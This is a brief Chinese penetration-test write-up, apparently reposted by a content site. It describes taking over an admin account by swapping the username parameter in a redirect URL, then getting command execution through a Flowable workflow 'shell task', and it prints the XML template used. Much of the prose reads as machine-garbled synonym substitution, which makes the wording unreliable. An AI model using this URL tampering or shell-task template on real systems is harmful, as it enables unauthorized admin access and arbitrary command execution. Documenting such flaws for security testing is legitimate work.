越权跳转招致的flowable命令执行

背景

项目中遇到的问题，停止记载。

过程

在目的系统测试一段时间没有收获过后发现一个叫做学习平台功用模块处发作跳转到8092端口上去。

后续察看数据包的时分发现，跳转方式是
http://xxx.com:8092/login?username=xx&token=xxx

抱着试一试的心态试了一下，将userName换成了admin，重新访问后，直接以管理员的身份进入这个系统的后台。

后续理解到之前有人挖到过这个洞，但是甲方不收，就准备简单看一下这边的功用。
绕了半天在一个流程模板的功用点发现运用了一款叫做flowable的工作流引擎。

然后看了一下，发现了一个叫做shell任务的模块。

试了一下，在里面写入命令，但仿佛没有中央能够让这个任务直接运转起来，后续去看了一下文档，也没有找到特别多的可应用信息。

找了一圈得shell任务是怎样写的。

<serviceTask id="shellEcho" flowable:type="shell" >
  <extensionElements>
    <flowable:field name="command" stringValue="cmd" />
    <flowable:field name="arg1" stringValue="/c" />
    <flowable:field name="arg2" stringValue="echo" />
    <flowable:field name="arg3" stringValue="EchoTest" />
    <flowable:field name="arg4" stringValue=">" />
    <flowable:field name="arg5" stringValue="D:\content\sec.txt" />
    <flowable:field name="wait" stringValue="true" />
    <flowable:field name="outputVariable" stringValue="resultVar" />
  </extensionElements>
</serviceTask>

感谢您的来访，获取更多精彩文章请收藏本站。